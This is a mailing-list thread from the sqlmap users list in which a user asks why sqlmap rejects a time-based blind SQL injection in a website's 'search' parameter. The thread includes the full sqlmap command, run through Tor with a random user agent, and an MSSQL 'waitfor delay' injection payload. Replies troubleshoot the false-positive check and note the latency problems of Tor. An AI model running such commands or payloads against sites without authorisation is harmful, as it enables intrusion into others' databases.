Re: [sqlmap-users] MsSQL - wait command
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] MsSQL - wait command
|
From: Miroslav S. <mir...@gm...> - 2014-12-08 11:08:46
|
For sure it is. sqlmap gives you a huge nagging message in such case (network latency...blaballa). Bye On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <ro...@di...nja> wrote: > Wouldn't it be a bad idea trying to do a time based attack over Tor? > > Robin > > On 8 December 2014 at 11:00, Miroslav Stampar > <mir...@gm...> wrote: > > Hi. > > > > 1) Shouldn't "waitfor delay '0:0:0'" make no delay? > > 2) sqlmap says "false positive or unexploitable injection point > detected". > > Is there a possibility that the character > is filtered? > > 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to > use > > in "false positive check" phase. Then you'll see what fails. > > > > Bye > > > > On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> > wrote: > >> > >> Hi, > >> > >> There is a website that vulnerable to SQL injection. I have checked and > >> I'm sure there is blind sql injection vulnerability but the sqlmap > could not > >> find this. > >> I tried this command: > >> ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 > --random-agent > >> --risk 3 --level 3 --technique=T --dbms="MsSQL" > >> and the output was something like this: > >> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase > >> time-based blind' injectable > >> [INFO] checking if the injection point on GET parameter 'search' is a > >> false positive > >> [WARNING] false positive or unexploitable injection point detected > >> [WARNING] GET parameter 'search' is not injectable > >> > >> > >> the "search" parameter is vulnerable to this payload: '); waitfor delay > >> '0:0:0' -- > >> > >> Did I make a mistake or the sqlmap did not find that? > >> > >> Best Regards > >> > >> > >> > ------------------------------------------------------------------------------ > >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards > >> with Interactivity, Sharing, Native Excel Exports, App Integration & > more > >> Get technology previously reserved for billion-dollar corporations, FREE > >> > >> > http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > ------------------------------------------------------------------------------ > > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > > with Interactivity, Sharing, Native Excel Exports, App Integration & more > > Get technology previously reserved for billion-dollar corporations, FREE > > > http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > -- Miroslav Stampar http://about.me/stamparm |
